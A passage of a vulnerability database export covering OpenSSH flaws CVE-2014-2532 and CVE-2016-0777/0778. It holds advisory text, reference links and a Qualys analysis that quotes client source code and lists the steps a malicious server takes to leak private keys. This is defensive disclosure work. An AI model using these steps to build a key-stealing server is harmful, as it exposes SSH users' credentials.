install revision A.06.20.011 or subsequent\n\nHP-UX B.11.31\n==============\nSecure_Shell.SECSH-CMN\nSecure_Shell.SECURE_SHELL\naction: install revision A.06.20.012 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY: Version:1 (rev.1) - 7 November 2014 Initial Release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2532"
},
{
"db": "BID",
"id": "66355"
},
{
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"db": "PACKETSTORM",
"id": "128654"
},
{
"db": "PACKETSTORM",
"id": "126580"
},
{
"db": "PACKETSTORM",
"id": "133803"
},
{
"db": "PACKETSTORM",
"id": "126075"
},
{
"db": "PACKETSTORM",
"id": "131103"
},
{
"db": "PACKETSTORM",
"id": "126023"
},
{
"db": "PACKETSTORM",
"id": "125859"
},
{
"db": "PACKETSTORM",
"id": "129077"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-2532",
"trust": 2.8
},
{
"db": "BID",
"id": "66355",
"trust": 1.4
},
{
"db": "SECUNIA",
"id": "59855",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "59313",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57488",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57574",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1029925",
"trust": 1.1
},
{
"db": "MLIST",
"id": "[SECURITY-ANNOUNCE] 20140315 ANNOUNCE: OPENSSH 6.6 RELEASED",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336",
"trust": 0.6
},
{
"db": "JUNIPER",
"id": "JSA10661",
"trust": 0.3
},
{
"db": "VULMON",
"id": "CVE-2014-2532",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "128654",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126580",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "133803",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126075",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "131103",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126023",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "125859",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "129077",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"db": "BID",
"id": "66355"
},
{
"db": "PACKETSTORM",
"id": "128654"
},
{
"db": "PACKETSTORM",
"id": "126580"
},
{
"db": "PACKETSTORM",
"id": "133803"
},
{
"db": "PACKETSTORM",
"id": "126075"
},
{
"db": "PACKETSTORM",
"id": "131103"
},
{
"db": "PACKETSTORM",
"id": "126023"
},
{
"db": "PACKETSTORM",
"id": "125859"
},
{
"db": "PACKETSTORM",
"id": "129077"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"id": "VAR-201403-0275",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4440100783333334
},
"last_update_date": "2024-07-23T20:15:55.666000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "openssh-6.6",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=48725"
},
{
"title": "Ubuntu Security Notice: openssh vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2155-1"
},
{
"title": "Debian CVElist Bug Report Logs: If server offers certificate, doesn\u0027t fall back to checking SSHFP records (CVE-2014-2653)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e2b29b5960fd84d7d2fed1e9bad51e83"
},
{
"title": "Debian Security Advisories: DSA-2894-1 openssh -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=097ff1ee5afacf7965034aa9b90de6de"
},
{
"title": "Amazon Linux AMI: ALAS-2014-369",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-369"
},
{
"title": "Brocade Security Advisories: BSA-2017-253",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=2d463347de7f8b5b2483cc00eb7338bc"
},
{
"title": "Symantec Security Advisories: SA104 : OpenSSH Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b643e473a764678a8d1ded300d5699b6"
},
{
"title": "Apple: OS X El Capitan v10.11",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=e88bab658248444f5dffc23fd95859e7"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://marc.info/?l=openbsd-security-announce\u0026m=139492048027313\u0026w=2"
},
{
"trust": 1.4,
"url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory4.asc"
},
{
"trust": 1.4,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"trust": 1.3,
"url": "http://advisories.mageia.org/mgasa-2014-0143.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2014-1552.html"
},
{
"trust": 1.2,
"url": "http://www.ubuntu.com/usn/usn-2155-1"
},
{
"trust": 1.1,
"url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00008.html"
},
{
"trust": 1.1,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-june/134026.html"
},
{
"trust": 1.1,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-may/133537.html"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=141576985122836\u0026w=2"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57488"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57574"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/59313"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/59855"
},
{
"trust": 1.1,
"url": "http://www.debian.org/security/2014/dsa-2894"
},
{
"trust": 1.1,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:068"
},
{
"trust": 1.1,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:095"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/66355"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1029925"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91986"
},
{
"trust": 1.1,
"url": "https://support.apple.com/ht205267"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2532"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2653"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1077843"
},
{
"trust": 0.3,
"url": "http://www.openssh.com/txt/release-6.6"
},
{
"trust": 0.3,
"url": "http://www.openssh.com"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021316"
},
{
"trust": 0.3,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10661\u0026cat=sirt_1\u0026actp=list"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04499681"
},
{
"trust": 0.3,
"url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097903"
},
{
"trust": 0.3,
"url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510"
},
{
"trust": 0.3,
"url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15430.html?ref=rss"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2532"
},
{
"trust": 0.2,
"url": "http://www.mandriva.com/en/support/security/"
},
{
"trust": 0.2,
"url": "http://www.mandriva.com/en/support/security/advisories/"
},
{
"trust": 0.2,
"url": "http://advisories.mageia.org/mgasa-2014-0166.html"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2653"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2014-369"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/2155-1/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=41307"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2014-2532.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/solutions/711953"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2014-2653.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4478"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0814"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-5107"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201405-06.xml"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4478"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4755"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2532"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5161"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-5161"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-5000"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-5000"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4755"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8080"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-2331"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-7187"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1351"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8090"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1352"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3951"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8147"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-2301"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht205265."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8611"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427"
},
{
"trust": 0.1,
"url": "http://gpgtools.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1855"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-2305"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-7186"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-6277"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
},
{
"trust": 0.1,
"url": "https://www.tencent.com)"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.2p2-6ubuntu0.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:5.3p1-3ubuntu7.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.0p1-3ubuntu1.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4548"
},
{
"trust": 0.1,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 0.1,
"url": "https://www.hp.com/go/swa"
},
{
"trust": 0.1,
"url": "http://h20293.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber="
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"db": "BID",
"id": "66355"
},
{
"db": "PACKETSTORM",
"id": "128654"
},
{
"db": "PACKETSTORM",
"id": "126580"
},
{
"db": "PACKETSTORM",
"id": "133803"
},
{
"db": "PACKETSTORM",
"id": "126075"
},
{
"db": "PACKETSTORM",
"id": "131103"
},
{
"db": "PACKETSTORM",
"id": "126023"
},
{
"db": "PACKETSTORM",
"id": "125859"
},
{
"db": "PACKETSTORM",
"id": "129077"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"db": "BID",
"id": "66355"
},
{
"db": "PACKETSTORM",
"id": "128654"
},
{
"db": "PACKETSTORM",
"id": "126580"
},
{
"db": "PACKETSTORM",
"id": "133803"
},
{
"db": "PACKETSTORM",
"id": "126075"
},
{
"db": "PACKETSTORM",
"id": "131103"
},
{
"db": "PACKETSTORM",
"id": "126023"
},
{
"db": "PACKETSTORM",
"id": "125859"
},
{
"db": "PACKETSTORM",
"id": "129077"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-18T00:00:00",
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"date": "2014-03-21T00:00:00",
"db": "BID",
"id": "66355"
},
{
"date": "2014-10-14T23:03:32",
"db": "PACKETSTORM",
"id": "128654"
},
{
"date": "2014-05-12T18:51:17",
"db": "PACKETSTORM",
"id": "126580"
},
{
"date": "2015-10-01T16:33:47",
"db": "PACKETSTORM",
"id": "133803"
},
{
"date": "2014-04-09T22:40:33",
"db": "PACKETSTORM",
"id": "126075"
},
{
"date": "2015-03-30T21:27:35",
"db": "PACKETSTORM",
"id": "131103"
},
{
"date": "2014-04-07T22:02:50",
"db": "PACKETSTORM",
"id": "126023"
},
{
"date": "2014-03-25T18:47:40",
"db": "PACKETSTORM",
"id": "125859"
},
{
"date": "2014-11-12T18:14:54",
"db": "PACKETSTORM",
"id": "129077"
},
{
"date": "2014-03-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"date": "2014-03-18T05:18:19",
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-19T00:00:00",
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"date": "2016-10-26T01:14:00",
"db": "BID",
"id": "66355"
},
{
"date": "2014-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"date": "2018-07-19T01:29:01.077000",
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "128654"
},
{
"db": "PACKETSTORM",
"id": "126580"
},
{
"db": "PACKETSTORM",
"id": "126075"
},
{
"db": "PACKETSTORM",
"id": "131103"
},
{
"db": "PACKETSTORM",
"id": "125859"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
}
],
"trust": 1.1
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH Permissions and Access Control Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
}
],
"trust": 0.6
}
}
VAR-201601-0029
Vulnerability from variot - Updated: 2024-07-23 19:54The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. Successfully exploiting this issue allows attackers to obtain sensitive information that may aid in further attacks. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
